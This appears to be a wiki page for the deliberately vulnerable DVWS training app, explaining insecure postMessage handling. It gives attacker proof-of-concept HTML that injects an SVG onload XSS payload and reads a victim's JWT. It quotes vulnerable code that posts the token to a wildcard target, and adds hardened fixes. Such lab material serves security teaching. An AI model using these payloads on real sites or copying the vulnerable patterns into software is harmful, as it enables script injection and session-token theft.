
Insecure PostMessage Configuration

Sam Sanoop edited this page Aug 23, 2020 · 2 revisions

Introduction

The window.postMessage method helps solve the cross-origin communication challenge by providing a controlled way for windows in different origins to exchange messages. Security issues can occur in scenarios such as:

  • A page that processes data from any origin insecurely, allowing cross-site scripting attacks
  • Pages that disclose sensitive information by posting data to the “*” wildcard target, or to a target that the attacker can control. Other information disclosure vulnerabilities arise when a page designed to proxy API calls on behalf of another origin does not apply adequate access controls

Details

Within the admin area of the DVWS application, an area exists which will display a user's token back to them.

(Screenshot: postmessage1)

This functionality is dependent on the following code:

  • userdisplay.js - A file that takes a user's JWTSessionID token and sends it to receiver.html
  • receiver.js - A file embedded within receiver.html that receives data from any origin and displays it using innerHTML

Cross-Site Scripting (XSS) via PostMessage

Since receiver.html accepts data from any origin, an attacker can inject malicious JavaScript, which will be displayed back in receiver.html.

Example Attacker Code

<!DOCTYPE html>
<html>
<head></head>
<body>
  <p>
    <button class="btn btn-black" id="send">Click Here Victim</button>
  </p>
  <iframe id="receiver" src="http://dvws.local/receiver.html" width="700" height="60">
    <p>Your browser does not support iframes.</p>
  </iframe>
  <script type="text/javascript">

    window.onload = function() {

      var receiver = document.getElementById('receiver').contentWindow;
      var btn = document.getElementById('send');
      function sendMessage(e) {
        e.preventDefault();
        receiver.postMessage("<svg/onload=alert(window.location.href)>", '*');
      }

      btn.addEventListener('click', sendMessage);
    }
  </script>

</body>
</html>
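The fix on the receiving side is to allow-list the sending origin and to write the data into a text sink rather than innerHTML. The following is an added example, not code from DVWS: it puts the receive-any-origin-into-innerHTML pattern the page describes next to a hardened handler, and runs both over a constructed message event carrying the SVG payload from the attacker page above. The element and event objects are plain stand-ins for DOM objects so it runs outside a browser; the trusted origin http://dvws.local is assumed from the iframe URL above, and http://attacker.example is a constructed placeholder origin.

```javascript
// Added example (not DVWS code). Origin the receiver should accept messages
// from; assumed from the application URL used on this page.
const TRUSTED_ORIGINS = ["http://dvws.local"];

// Vulnerable pattern: no origin check and an HTML sink. Any document that can
// obtain a reference to this window can push markup into it.
function vulnerableHandler(element) {
  return function (event) {
    element.innerHTML = event.data;
    return { accepted: true, sink: "innerHTML" };
  };
}

// Hardened pattern: allow-list event.origin, require the expected type and a
// sane size, and use a text sink so markup is never interpreted.
function hardenedHandler(element, trustedOrigins) {
  return function (event) {
    if (!trustedOrigins.includes(event.origin)) {
      return { accepted: false, reason: "untrusted origin: " + event.origin };
    }
    if (typeof event.data !== "string" || event.data.length > 4096) {
      return { accepted: false, reason: "unexpected payload" };
    }
    element.textContent = event.data;
    return { accepted: true, sink: "textContent" };
  };
}

// Constructed message event matching the attacker page above: the payload is
// SVG markup arriving from an untrusted (constructed) origin.
const attackerEvent = {
  origin: "http://attacker.example",
  data: "<svg/onload=alert(window.location.href)>",
};

// Constructed event from the application's own origin.
const legitimateEvent = { origin: "http://dvws.local", data: "token-value" };

// Runs both handlers over the two events and returns what each did.
function demoReceiver() {
  // Stand-ins for the DOM element the token is displayed in.
  const vulnerableEl = { innerHTML: "", textContent: "" };
  const hardenedEl = { innerHTML: "", textContent: "" };
  const vuln = vulnerableHandler(vulnerableEl);
  const hard = hardenedHandler(hardenedEl, TRUSTED_ORIGINS);
  return {
    vulnerable: vuln(attackerEvent),          // accepted; markup now in innerHTML
    vulnerableEl,
    hardenedRejected: hard(attackerEvent),    // dropped on the origin check
    hardenedAccepted: hard(legitimateEvent),  // accepted into textContent
    hardenedEl,                               // innerHTML never touched
  };
}

// In a real page: window.addEventListener("message",
//   hardenedHandler(document.getElementById("output"), TRUSTED_ORIGINS));
```

The origin check must compare against an exact origin string (scheme, host and port), not a substring or a regular expression over the URL; the text sink is what guarantees that even a message from a compromised trusted origin cannot become script.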

(Screenshot: Insecure Postmessage)

Cross-Site Script Inclusion/Information Leakage via Postmessage

The userdisplay.js file loads the user's JWT token from localStorage and uses a template literal to send it to the receiver page. The code that provides this functionality is below:

// The token is read from localStorage into a global variable, so any script
// loaded into the same document can read it
var jwt = localStorage.getItem("JWTSessionID");

window.onload = function() {

	var receiver = document.getElementById('receiver').contentWindow;
	var btn = document.getElementById('send');
	function sendMessage(e) {
		e.preventDefault();
		// The token is posted to the "*" wildcard target, so whatever origin is
		// currently loaded in the frame receives it
		receiver.postMessage(`${jwt}`, '*');
	}

	btn.addEventListener('click', sendMessage);
}
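The sending side has its own fix: name the one origin that is allowed to receive the token instead of "*". The following is an added example, not code from DVWS, showing why that argument matters. MockWindow stands in for an iframe's contentWindow and models the browser rule that a posted message is delivered only if targetOrigin is "*" or matches the origin the receiving window is currently showing; http://dvws.local is assumed as the application origin and http://attacker.example is a constructed placeholder for a frame that has been navigated away from the application.

```javascript
// Added example (not DVWS code). Stand-in for an iframe's contentWindow.
class MockWindow {
  constructor(origin) {
    this.origin = origin;   // origin of the document the frame currently shows
    this.delivered = [];    // messages that actually reached that document
  }
  // Models the browser's targetOrigin check for postMessage.
  postMessage(data, targetOrigin) {
    if (targetOrigin === "*" || targetOrigin === this.origin) {
      this.delivered.push(data);
      return true;
    }
    return false; // silently dropped; the document in the frame never sees it
  }
}

// The pattern from userdisplay.js above: wildcard target.
function sendTokenInsecure(receiver, token) {
  return receiver.postMessage(`${token}`, "*");
}

// Hardened sender: the token may only go to the application's own origin.
const RECEIVER_ORIGIN = "http://dvws.local"; // assumed application origin

function sendTokenHardened(receiver, token, targetOrigin = RECEIVER_ORIGIN) {
  if (targetOrigin === "*") {
    throw new Error("refusing to post a session token to a wildcard target");
  }
  return receiver.postMessage(`${token}`, targetOrigin);
}

// Sends a constructed token with both senders to a frame that still shows the
// application and to the same frame after it was navigated elsewhere.
function demoSender() {
  const token = "constructed.jwt.value";
  const appFrame = new MockWindow("http://dvws.local");
  const hijackedFrame = new MockWindow("http://attacker.example"); // constructed
  return {
    insecureToApp: sendTokenInsecure(appFrame, token),           // delivered
    insecureToHijacked: sendTokenInsecure(hijackedFrame, token), // delivered: leak
    hardenedToApp: sendTokenHardened(appFrame, token),           // delivered
    hardenedToHijacked: sendTokenHardened(hijackedFrame, token), // dropped
    leaked: hijackedFrame.delivered,
  };
}
```

The targetOrigin argument is the sender's only control over where the data lands once a frame reference has been handed out, so a token, session identifier or other secret should never be posted with "*"; the explicit origin also protects against the case where the frame's content has changed between the page loading and the click.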

This can be stolen by an attacker by hosting the attack code below and getting a victim to browse to their site.

<!DOCTYPE html>
<html>

<head>
</head>

<body>
  <script src="/static/userdisplay.js"></script>

  <script>console.log(jwt)</script>
  <p>Exploit</p>
</body>

</html>
